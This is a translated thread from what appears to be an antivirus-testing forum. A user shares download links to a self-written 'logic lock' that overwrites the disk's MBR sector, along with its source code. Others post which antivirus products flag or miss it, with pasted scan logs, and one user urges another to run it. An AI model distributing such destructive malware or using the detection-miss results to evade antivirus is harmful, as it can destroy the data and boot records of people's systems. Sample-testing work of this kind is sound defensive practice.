
[Virus sample] MBRLogicKill

3245076553
Posted on 2021-2-19 18:29:02
A logic lock I tried writing
https://wwx.lanzoui.com/iHWwTluotcb
Source code
https://wwx.lanzoui.com/i76XVluotba

Data written to the hard disk's MBR sector


hsks
Posted on 2021-2-19 18:31:31
Last edited by hsks on 2021-2-19 18:43

360

a233
Posted on 2021-2-19 18:31:43
Avast
Win32:Evo-gen [Susp]
ParanoiaSeal
Posted on 2021-2-19 18:40:54
Last edited by ParanoiaSeal on 2021-2-19 18:45

智量 (WiseVector): Heur.ML.PE.A
Huorong: miss
Kaspersky KTS: miss
I can't get the screenshots to upload

Kaspersky log:
事件 :        任务已完成
应用程序名称 :        avp.exe
应用程序路径 :        C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 21.2
用户 :        DESKTOP-KUC1A7V\Paran
用户类型 :        活动用户
组件 :        病毒扫描
结果 :        任务已完成


Huorong log:
病毒库时间:2021-02-18 17:06
开始时间:2021-02-19 18:36
总计用时:00:00:02
扫描对象:9
扫描文件:1
发现风险:0
已处理风险:0


anthonyqian
Posted on 2021-2-19 18:47:19
Norton doesn't flag it. Reputation unknown; I haven't double-clicked it...
761773275
Posted on 2021-2-19 18:53:00
Last edited by 761773275 on 2021-2-19 18:54
anthonyqian posted on 2021-2-19 18:47
Norton doesn't flag it. Reputation unknown; I haven't double-clicked it...

Double-click it
@温馨小屋
k2132
Posted on 2021-2-19 18:54:29
智量 (WiseVector)

761773275
Posted on 2021-2-19 18:55:07

正在缓冲
Posted on 2021-2-19 18:55:18
Microsoft Defender
Trojan:Win32/Spursint.F!cl

anthonyqian
Posted on 2021-2-19 18:57:28

Let's wait for him then; mine is installed on a physical machine
Copyright © KaFan  KaFan.cn All Rights Reserved.